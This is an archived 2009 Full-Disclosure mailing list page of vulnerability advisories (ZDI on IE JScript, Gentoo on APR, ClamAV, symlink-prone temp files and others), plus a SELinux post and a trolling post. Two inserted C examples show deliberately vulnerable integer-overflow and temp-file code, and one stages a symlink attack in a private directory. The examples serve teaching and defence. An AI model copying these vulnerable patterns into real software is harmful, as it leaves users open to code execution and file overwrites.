[Full-disclosure] ZDI-09-062: Microsoft Internet Explorer JScript arguments Invocation Memory Corruption Vulnerability

2009-09-09 Thread ZDI Disclosures
ZDI-09-062: Microsoft Internet Explorer JScript arguments Invocation Memory
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-062
September 8, 2009

-- CVE ID:
CVE-2009-1920

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8436.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists when parsing the jscript keyword arguments.
Because the arguments object is not available until a certain time,
invoking it can result in memory corruption. Successful exploitation of
this vulnerability can lead to a remote system compromise under the
credentials of the current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-045.mspx

-- Disclosure Timeline:
2009-04-28 - Vulnerability reported to vendor
2009-09-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* ling wushi of team509

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] R. RHEL, RHCS, and Selinux : hype, reality or dream?

2009-09-09 Thread yersinia
So it seems that it is not necessary to be a clever hacker like spender to
disable SELinux on a system
(http://grsecurity.net/~spender/exploit.txt).
Just follow the directions of the vendor. This one requires disabling
SELinux for the proper functioning of one of its HA products, after years in
which the same vendor was critical of commercial products, or of badly
compiled open source, for SELinux execmem or textreloc issues, because they
required the same.

http://marc.info/?l=selinux&m=125244025732144&w=2


James Morris' first answer:

http://marc.info/?l=selinux&m=125245247920355&w=2


So articles like this are just marketing?


http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/

Regards

Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My clients have Asperger syndrome.

2009-09-09 Thread full-censorship
Central Security District of UK [MI7.5] shadowdong...@hush.com wrote:

I just got off the phone with intelligence.

MI7 and the CIB (Upgraded from CIA++, super savage secret) have
relayed to me in code that n3td3v security is coming back stronger
than ever.

Over in Langley we know that n3td3v has the finest security
tactics. Super fortified servers.

Ultra mega ram.

He is truly one of the most experienced blackhats in all the land.

He is a master criminal.

In other news, Gary McKinnon, elite pentagon hacker is an autistic
rockstar:

http://www.youtube.com/watch?v=XcOY0kWQaqc

He's milking the success of his crime; instead of apologizing, he's
gloating. I guess that teaches people hacking is OK.

My name is shadowdong007. Roger wilco.

- Gary McKinnon, CISSP, MD.

autistic only when I commit crimes, but really me when I'm on TV

this is not n3td3v - lawyer

this is a private mailing list, you're not allowed to say that. you
should read up about public and private ownership.



[Full-disclosure] [ GLSA 200909-03 ] Apache Portable Runtime, APR Utility Library: Execution of arbitrary code

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Apache Portable Runtime, APR Utility Library: Execution of
arbitrary code
  Date: September 09, 2009
  Bugs: #280514
ID: 200909-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows in the Apache Portable Runtime and its
Utility Library might allow for the remote execution of arbitrary code.

Background
==

The Apache Portable Runtime (aka APR) provides a set of APIs for
creating platform-independent applications. The Apache Portable Runtime
Utility Library (aka APR-Util) provides an interface to functionality
such as XML parsing, string matching and databases connections.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-libs/apr             < 1.3.8                          >= 1.3.8
  2  dev-libs/apr-util        < 1.3.9                          >= 1.3.9
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===

Matt Lewis reported multiple integer overflows in the apr_rmm_malloc(),
apr_rmm_calloc(), and apr_rmm_realloc() functions in misc/apr_rmm.c of
APR-Util and in memory/unix/apr_pools.c of APR, both occurring when
aligning memory blocks.
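The bug class named in the Description, shown as an added example that is not APR's, APR-Util's or Gentoo's code: an APR_ALIGN-style round-up macro wraps for sizes within a few bytes of SIZE_MAX, so an unchecked allocator reserves far less than was requested, while the hardened variant rejects any size whose arithmetic would wrap. The BLOCK_HEADER constant and all function names are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Round-up macro in the style of APR's APR_ALIGN(size, boundary):
 * (size + boundary - 1) & ~(boundary - 1). In size_t arithmetic the
 * addition silently wraps once size is within boundary - 1 of SIZE_MAX. */
#define ALIGN_UP(size, boundary) \
    (((size_t)(size) + ((size_t)(boundary) - 1)) & ~((size_t)(boundary) - 1))

#define ALIGN_BOUNDARY 8   /* APR_ALIGN_DEFAULT rounds to an 8-byte boundary */
#define BLOCK_HEADER  16   /* constructed: bookkeeping bytes prepended to a block */

/* Unchecked alignment, the vulnerable shape: may return a value smaller
 * than its input (down to zero) once the addition wraps. */
size_t align_unchecked(size_t size) {
    return ALIGN_UP(size, ALIGN_BOUNDARY);
}

/* Hardened alignment: refuse any size whose round-up would exceed SIZE_MAX.
 * Returns 1 and stores the aligned size, or 0 if the arithmetic would wrap. */
int align_checked(size_t size, size_t *out) {
    if (size > SIZE_MAX - (ALIGN_BOUNDARY - 1))
        return 0;
    *out = ALIGN_UP(size, ALIGN_BOUNDARY);
    return 1;
}

/* Aligned size, or 0 when the request is rejected. */
size_t align_checked_or_zero(size_t size) {
    size_t out = 0;
    return align_checked(size, &out) ? out : 0;
}

/* Bytes a toy block allocator would reserve for reqsize payload bytes.
 * Adding the header before aligning is exactly the pattern in which a
 * wrapped result yields a tiny reservation followed by an out-of-bounds
 * write of the full requested length. */
size_t reserve_unchecked(size_t reqsize) {
    return align_unchecked(reqsize + BLOCK_HEADER);
}

/* Same computation with both additions guarded; 0 means rejected. */
size_t reserve_checked_or_zero(size_t reqsize) {
    size_t out = 0;
    if (reqsize > SIZE_MAX - BLOCK_HEADER)
        return 0;
    return align_checked(reqsize + BLOCK_HEADER, &out) ? out : 0;
}

/* Invariant every allocator must keep: the reservation covers the request. */
int reservation_is_sane(size_t reqsize, size_t reserved) {
    return reserved >= reqsize;
}

int main(void) {
    size_t huge = SIZE_MAX - 20;
    printf("unchecked: request %zu -> reserve %zu (sane=%d)\n",
           huge, reserve_unchecked(huge),
           reservation_is_sane(huge, reserve_unchecked(huge)));
    printf("checked:   request %zu -> reserve %zu (0 = rejected)\n",
           huge, reserve_checked_or_zero(huge));
    return 0;
}
```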

Impact
==

A remote attacker could entice a user to connect to a malicious server
with software that uses the APR or act as a malicious client to a
server that uses the APR (such as Subversion or Apache servers),
possibly resulting in the execution of arbitrary code with the
privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Apache Portable Runtime users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-libs/apr-1.3.8

All APR Utility Library users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-libs/apr-util-1.3.9

References
==

  [ 1 ] CVE-2009-2412
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-03.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-04 ] Clam AntiVirus: Multiple vulnerabilities

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Clam AntiVirus: Multiple vulnerabilities
  Date: September 09, 2009
  Bugs: #264834, #265545
ID: 200909-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in ClamAV allow for the remote execution of
arbitrary code or Denial of Service.

Background
==

Clam AntiVirus (short: ClamAV) is an anti-virus toolkit for UNIX,
designed especially for e-mail scanning on mail gateways.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav     < 0.95.2                        >= 0.95.2

Description
===

Multiple vulnerabilities have been found in ClamAV:

* The vendor reported a Divide-by-zero error in the PE (Portable
  Executable; Windows .exe) file handling of ClamAV (CVE-2008-6680).

* Jeffrey Thomas Peckham found a flaw in libclamav/untar.c, possibly
  resulting in an infinite loop when processing TAR archives in clamd
  and clamscan (CVE-2009-1270).

* Martin Olsen reported a vulnerability in the CLI_ISCONTAINED macro
  in libclamav/others.h, when processing UPack archives
  (CVE-2009-1371).

* Nigel disclosed a stack-based buffer overflow in the
  cli_url_canon() function in libclamav/phishcheck.c when processing
  URLs (CVE-2009-1372).

Impact
==

A remote attacker could entice a user or automated system to process a
specially crafted UPack archive or a file containing a specially
crafted URL, possibly resulting in the remote execution of arbitrary
code with the privileges of the user running the application, or a
Denial of Service. Furthermore, a remote attacker could cause a Denial
of Service by supplying a specially crafted TAR archive or PE
executable to a Clam AntiVirus instance.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Clam AntiVirus users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-antivirus/clamav-0.95.2

References
==

  [ 1 ] CVE-2008-6680
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6680
  [ 2 ] CVE-2009-1270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1270
  [ 3 ] CVE-2009-1371
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1371
  [ 4 ] CVE-2009-1372
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1372

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-04.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-05 ] Openswan: Denial of Service

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Openswan: Denial of Service
  Date: September 09, 2009
  Bugs: #264346, #275233
ID: 200909-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in the pluto IKE daemon of Openswan might
allow remote attackers to cause a Denial of Service.

Background
==

Openswan is an implementation of IPsec for Linux.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/openswan        < 2.4.15                        >= 2.4.15

Description
===

Multiple vulnerabilities have been discovered in Openswan:

* Gerd v. Egidy reported a NULL pointer dereference in the Dead Peer
  Detection of the pluto IKE daemon as included in Openswan
  (CVE-2009-0790).

* The Orange Labs vulnerability research team discovered multiple
  vulnerabilities in the ASN.1 parser (CVE-2009-2185).

Impact
==

A remote attacker could exploit these vulnerabilities by sending
specially crafted R_U_THERE or R_U_THERE_ACK packets, or a specially
crafted X.509 certificate containing a malicious Relative Distinguished
Name (RDN), UTCTIME string or GENERALIZEDTIME string to cause a Denial
of Service of the pluto IKE daemon.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Openswan users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-misc/openswan-2.4.15

References
==

  [ 1 ] CVE-2009-0790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0790
  [ 2 ] CVE-2009-2185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2185

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-05.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-06 ] aMule: Parameter injection

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: aMule: Parameter injection
  Date: September 09, 2009
  Bugs: #268163
ID: 200909-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An input validation error in aMule enables remote attackers to pass
arbitrary parameters to a victim's media player.

Background
==

aMule is an eMule-like client for the eD2k and Kademlia networks,
supporting multiple platforms.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-p2p/amule            < 2.2.5                          >= 2.2.5

Description
===

Sam Hocevar discovered that the aMule preview function does not
properly sanitize file names.

Impact
==

A remote attacker could entice a user to download a file with a
specially crafted file name to inject arbitrary arguments to the
victim's video player.

Workaround
==

There is no known workaround at this time.

Resolution
==

All aMule users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-p2p/amule-2.2.5

References
==

  [ 1 ] CVE-2009-1440
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1440

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-06.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-07 ] TkMan: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: TkMan: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #247540
ID: 200909-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in TkMan, allowing
for symlink attacks.

Background
==

TkMan is a graphical, hypertext manual page and Texinfo browser for
UNIX.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-text/tkman           < 2.2-r1                        >= 2.2-r1

Description
===

Dmitry E. Oboukhov reported that TkMan does not handle the
/tmp/tkman# and /tmp/ll temporary files securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All TkMan users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-text/tkman-2.2-r1

References
==

  [ 1 ] CVE-2008-5137
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5137

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-07.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-08 ] C* music player: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: C* music player: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #250474
ID: 200909-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in the C* music
player, allowing for symlink attacks.

Background
==

The C* Music Player (cmus) is a modular and very configurable
ncurses-based audio player.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  media-sound/cmus         < 2.2.0-r1                    >= 2.2.0-r1

Description
===

Dmitry E. Oboukhov reported that cmus-status-display does not handle
the /tmp/cmus-status temporary file securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All C* music player users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =media-sound/cmus-2.2.0-r1

References
==

  [ 1 ] CVE-2008-5375
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5375

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-08.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-09 ] Screenie: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Screenie: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #250476
ID: 200909-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in Screenie,
allowing for symlink attacks.

Background
==

Screenie is a small screen frontend that is designed to be a session
handler.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-misc/screenie        < 1.30.0-r1                  >= 1.30.0-r1

Description
===

Dmitry E. Oboukhov reported that Screenie does not handle
/tmp/.screenie.# temporary files securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Screenie users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-misc/screenie-1.30.0-r1

References
==

  [ 1 ] CVE-2008-5371
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5371

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-10 ] LMBench: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: LMBench: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #246015
ID: 200909-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple insecure temporary file usage issues have been reported in
LMBench, allowing for symlink attacks.

Background
==

LMBench is a suite of simple, portable benchmarks for UNIX platforms.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-benchmarks/lmbench        <= 3                      Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.

Description
===

Dmitry E. Oboukhov reported that the rccs and STUFF scripts do not
handle /tmp/sdiff.# temporary files securely. NOTE: There might
be further occurrences of insecure temporary file usage.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

LMBench has been removed from Portage. We recommend that users unmerge
LMBench:

# emerge --unmerge app-benchmarks/lmbench

References
==

  [ 1 ] CVE-2008-4968
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4968

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200909-11 ] GCC-XML: Insecure temporary file usage

2009-09-09 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: GCC-XML: Insecure temporary file usage
  Date: September 09, 2009
  Bugs: #245765
ID: 200909-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in GCC-XML allowing
for symlink attacks.

Background
==

GCC-XML is an XML output extension to the C++ front-end of GCC.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-cpp/gccxml     < 0.9.0_pre20090516        >= 0.9.0_pre20090516

Description
===

Dmitry E. Oboukhov reported that find_flags in GCC-XML does not handle
/tmp/*.cxx temporary files securely.

Impact
==

A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application.
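The five "insecure temporary file usage" advisories above (GLSA 200909-07 through 200909-11) share one bug class. As an added example that is not code from any of those projects or from Gentoo, the writer below contrasts the vulnerable fopen-on-a-fixed-name pattern with an open(2) call that refuses to reuse or follow a planted symlink, plus a harness that reproduces the scenario inside a private directory. File names and function names are constructed; the code assumes a POSIX system with O_NOFOLLOW.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable pattern from the advisories: a fixed, predictable name in a
 * shared directory opened with plain fopen("w"). fopen follows a symlink
 * planted at that name, so the write lands in whatever the link points at,
 * with the caller's privileges. */
int write_status_insecure(const char *path, const char *msg) {
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs(msg, f);
    return fclose(f) == 0 ? 0 : -1;
}

/* Hardened writer: O_CREAT|O_EXCL fails with EEXIST if anything, a symlink
 * included, already occupies the name; O_NOFOLLOW additionally refuses to
 * follow a symlink; mode 0600 keeps the file private. Returns 0 on success,
 * -1 with errno set otherwise. For a genuinely temporary file, mkstemp(3)
 * is the better tool because it also picks an unpredictable name. */
int write_status_secure(const char *path, const char *msg) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    size_t len = strlen(msg);
    ssize_t n = write(fd, msg, len);
    close(fd);
    return (n >= 0 && (size_t)n == len) ? 0 : -1;
}

/* First line of path into buf, newline stripped; empty string on failure. */
static void read_first_line(const char *path, char *buf, size_t len) {
    buf[0] = '\0';
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return;
    if (fgets(buf, (int)len, f) != NULL)
        buf[strcspn(buf, "\n")] = '\0';
    fclose(f);
}

/* Reproduces the advisories' scenario in a private directory: a symlink is
 * planted at the predictable name, pointing at a victim file. Returns 1 if
 * the insecure writer overwrote the victim while the secure writer refused
 * (EEXIST) and left it alone, 0 if either behaved otherwise, -1 on setup
 * failure. */
int demo_symlink_attack(void) {
    char dir[] = "/tmp/glsa-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./glsa-demo-XXXXXX");  /* fallback if /tmp is unusable */
        if (mkdtemp(dir) == NULL)
            return -1;
    }
    char victim[128], link[128], seen[64];
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(link, sizeof link, "%s/status", dir);  /* the predictable name */

    FILE *v = fopen(victim, "w");
    if (v == NULL)
        return -1;
    fputs("original\n", v);
    fclose(v);
    if (symlink(victim, link) != 0)
        return -1;

    int insecure_rc = write_status_insecure(link, "clobbered\n");
    read_first_line(victim, seen, sizeof seen);
    int victim_clobbered = strcmp(seen, "clobbered") == 0;

    int secure_rc = write_status_secure(link, "never-written\n");
    int secure_errno = errno;
    read_first_line(victim, seen, sizeof seen);
    int victim_untouched_by_secure = strcmp(seen, "clobbered") == 0;

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return (insecure_rc == 0 && victim_clobbered
            && secure_rc == -1 && secure_errno == EEXIST
            && victim_untouched_by_secure) ? 1 : 0;
}

int main(void) {
    printf("insecure writer followed the symlink, secure writer refused: %s\n",
           demo_symlink_attack() == 1 ? "yes" : "no");
    return 0;
}
```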

Workaround
==

There is no known workaround at this time.

Resolution
==

All GCC-XML users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-cpp/gccxml-0.9.0_pre20090516

References
==

  [ 1 ] CVE-2008-4957
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4957

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] TCP/IP Orphaned Connections Vulnerability

2009-09-09 Thread Fabian Yamaguchi
Hi,

